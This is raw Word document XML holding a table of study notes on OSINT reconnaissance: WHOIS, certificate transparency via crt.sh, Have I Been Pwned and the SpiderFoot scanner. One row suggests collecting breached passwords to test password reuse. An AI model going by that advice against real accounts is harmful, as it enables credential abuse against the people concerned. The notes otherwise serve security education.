                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>metadata</w:t>
            </w:r>
            <w:r w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004D40B3" w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>and many more.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0675889C" w14:textId="77777777" w:rsidR="004D40B3" w:rsidRDefault="004D40B3" w:rsidP="009B583F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OSINT is the collective representation of this data in a useful manner.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40232E58" w14:textId="0CE545E2" w:rsidR="004D40B3" w:rsidRPr="009B583F" w:rsidRDefault="004D40B3" w:rsidP="009B583F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Leveraged offensively and defensively.</w:t>
            </w:r>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28A749BF" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="003A28B0" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="7DB9B28F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="772A4550" w14:textId="6206E3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WHOIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B89883F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00360A1C" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WHOIS data used to be a valuable source of email, phone, and address data. GDPR compliance ended that run.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41784441" w14:textId="77777777" w:rsidR="00360A1C" w:rsidRDefault="00C656F8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">OSINT source is the collection of WHOIS data. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0A797F" w14:textId="77777777" w:rsidR="00C656F8" w:rsidRDefault="00C656F8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Registrar collects information such as </w:t>
            </w:r>
            <w:r w:rsidR="001B3494">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>name, phone number, address, and email information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB20BCC" w14:textId="3D44A522" w:rsidR="001B3494" w:rsidRPr="006F5A04" w:rsidRDefault="001B3494" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WHOIS data is classified as by the MITRE PRE-ATTACK framework. ID TI596.002</w:t>
            </w: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519253B6" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="001B3494" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F3262" w:rsidRPr="006F5A04" w14:paraId="77CC8352" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35A2058E" w14:textId="4B5BA2E2" w:rsidR="006F3262" w:rsidRPr="006F5A04" w:rsidRDefault="006F3262" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Certificate Transparency: The new WHOIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FEB59D" w14:textId="77777777" w:rsidR="006F3262" w:rsidRDefault="006F3262" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use certificate transparency searches to</w:t>
            </w:r>
            <w:r w:rsidR="0034189A">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> identify unknown targets associated with an organization, or the presence of now hosts that have not yet been advertised as available.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5EDBAB" w14:textId="055625EF" w:rsidR="0034189A" w:rsidRDefault="0034189A" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Modern Browsers do well </w:t>
            </w:r>
            <w:r w:rsidR="00D76BFE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>detect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> malicious website certificates.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF766D0" w14:textId="77777777" w:rsidR="0034189A" w:rsidRDefault="0034189A" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Modern browsers do not do well detecting malicious certs issued by trusted CAs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33FB6FC3" w14:textId="77777777" w:rsidR="0034189A" w:rsidRDefault="0034189A" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cert transparency requires CAs to publish certificate issuance logs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659A6B4E" w14:textId="42381775" w:rsidR="0034189A" w:rsidRDefault="0034189A" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Open for scrutiny to look for </w:t>
            </w:r>
            <w:r w:rsidR="00D76BFE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>suspicious</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> certs and for OSINT gathering.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23BBE205" w14:textId="54F9E81D" w:rsidR="0034189A" w:rsidRDefault="0034189A" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Gather information about targets, which CAs are in use. When certs are renewed and more.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79DA8D97" w14:textId="1A107A07" w:rsidR="006F3262" w:rsidRPr="006F5A04" w:rsidRDefault="006F3262" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5076C766" w14:textId="217CB0C2" w:rsidR="006F3262" w:rsidRDefault="006F3262" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03E46" w:rsidRPr="006F5A04" w14:paraId="35BDD564" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AB146A5" w14:textId="015DE8B6" w:rsidR="00F03E46" w:rsidRDefault="00F03E46" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Certificate transparency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DEFD8B9" w14:textId="7CC2CE1D" w:rsidR="00F03E46" w:rsidRDefault="00F03E46" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Crt.sh uses reveals hosts that may not be public yet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1559EE34" w14:textId="586A3BB3"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3613EED3" w14:textId="3B4D575B" w:rsidR="00F03E46" w:rsidRDefault="00F03E46" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03E46" w:rsidRPr="006F5A04" w14:paraId="5CEB4276" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C2D117A" w14:textId="2BC88978" w:rsidR="00F03E46" w:rsidRDefault="00F03E46" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Have I been pawned?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="191FC4FF" w14:textId="77777777" w:rsidR="00F03E46" w:rsidRDefault="003544B9" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">It is a clearing </w:t>
            </w:r>
            <w:r w:rsidR="00AE14D8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">house; they collect information from people that have been breached. They allow people to search by phone number or by email address. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28045634" w14:textId="063DAB18" w:rsidR="00AE14D8" w:rsidRDefault="00AE14D8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Identify if an account has been breached then collect the passwords to explore password reuse exposure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496BDD69" w14:textId="474E8621"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4A19DACA" w14:textId="01D6A8A9" w:rsidR="00F03E46" w:rsidRDefault="00F03E46" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>22</w:t>
            </w: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4B17C538" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00AE14D8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The challenge of OSING data: Lots of unique data sources.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="190F58E9" w14:textId="77777777" w:rsidR="00AE14D8" w:rsidRDefault="00AE14D8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OSINT data sources are many and varied in accessibility.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74622D1B"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Free, no registration required.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB18019"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Free, registration required.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F9365EC"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Paid, price per lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76874B14" w14:textId="63131A2F"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Paid, (inset payment collection model here)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8E5D0D" w14:textId="77777777" w:rsidR="00AE14D8" w:rsidRPr="00AE14D8" w:rsidRDefault="00AE14D8" w:rsidP="00AE14D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE14D8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Accessibility and confidence in OSING data sources can also be a challenge.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29FC0D2E"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Are you collecting all. The information available?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3997D9" w14:textId="64F66F70"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How can you collect and parse the information quickly?</w:t>
            </w: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4E94B776" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00AE14D8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91786" w:rsidRPr="006F5A04" w14:paraId="64397DEB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B9E3E4" w14:textId="27A8B0E2" w:rsidR="00B91786" w:rsidRPr="006F5A04" w:rsidRDefault="00B91786" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SpiderFoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="666875BF" w14:textId="103475E2" w:rsidR="0013351D" w:rsidRPr="006F5A04" w:rsidRDefault="00B91786" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Has a straightforward interface to collect OSINT data from hundreds of online sources. Specify a scan name and a seed target (Usually a hostname, email address, or a domain name) to start a scan</w:t>
            </w:r>
            <w:r w:rsidR="0013351D">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="507A0B02" w14:textId="77DE0A55" w:rsidR="00B91786" w:rsidRPr="006F5A04" w:rsidRDefault="00B91786" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="750537C5" w14:textId="0B1B6DB3" w:rsidR="00B91786" w:rsidRPr="006F5A04" w:rsidRDefault="00B91786" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">24 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0013351D" w:rsidRPr="006F5A04" w14:paraId="534ACC96" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CD57373" w14:textId="5ED734BE" w:rsidR="0013351D" w:rsidRDefault="0013351D" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SpiderFoot tip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03BAF4F9" w14:textId="2D56BF12" w:rsidR="0013351D" w:rsidRDefault="0013351D" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SpiderFoot queries data from many different online sources. Some sources require registration to obtain an API key, if you don’t specify an API key, SpiderFoot records that module as an error and scans with the other remaining modules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3654A10A" w14:textId="73ECD18E" w:rsidR="0013351D" w:rsidRDefault="0013351D" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
